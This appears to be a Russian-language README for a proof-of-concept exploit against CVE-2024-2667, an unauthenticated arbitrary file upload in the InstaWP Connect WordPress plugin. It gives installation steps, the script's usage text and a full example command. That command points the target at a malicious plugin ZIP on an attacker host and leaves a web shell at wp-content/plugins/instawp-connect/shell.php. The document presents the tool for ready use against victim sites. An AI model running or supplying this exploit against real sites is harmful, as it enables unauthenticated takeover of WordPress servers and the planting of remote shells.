
PoC-эксплойт для CVE-2024-2667: автоматизированная загрузка произвольных файлов и доступ к shell через недостаточную проверку файлов в REST API endpoint плагина InstaWP Connect для WordPress.
Плагин InstaWP Connect – 1-click WP Staging & Migration для WordPress уязвим к произвольной загрузке файлов из-за недостаточной проверки файлов в конечной точке REST API /wp-json/instawp-connect/v1/config во всех версиях вплоть до 0.1.0.22 включительно. Это позволяет неаутентифицированным атакующим загружать произвольные файлы.
| Описание | Детали | Иконка |
|---|---|---|
| Установка необходимых библиотек | Используйте pip для установки необходимых библиотек Python: requests и beautifulsoup4. | 🛠️ |
| Команда для установки | Выполните: pip install requests beautifulsoup4. | 📥 |
| Описание | Детали | Иконка |
|---|---|---|
| Путь к shell | При успешной загрузке shell будет доступен по адресу: | 🐚 |
wp-content/plugins/instawp-connect/shell.php. |
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
options:
-h, --help show this help message and exit
-up URL_PLUGIN, --url_plugin URL_PLUGIN
URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
-u URL_TARGET, --url_target URL_TARGET
URL of the target WordPress site (e.g., http://victim-domain/).
| Описание | Детали | Иконка |
|---|
| Запустите скрипт | Запустите скрипт из командной строки с необходимыми аргументами. | 🚀 |
| Обязательные аргументы | - -up: URL плагина (например, http://attacker-domain/malicious-plugin.zip). | |
- -u: URL целевого сайта WordPress (например, http://victim-domain/). | 🔧 | |
| Пример команды | python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/ | 📜 |
| Описание | Детали | Иконка |
|---|
| Проверка версии | Скрипт проверяет файл readme.txt на предмет версии целевого плагина. | 🔍 |
| Уязвимая версия | Если версия <= 0.1.0.22, скрипт выводит: The site is vulnerable. | ⚠️ |
| Безопасная версия | Если версия > 0.1.0.22, скрипт выводит: The site is not vulnerable. | ✅ |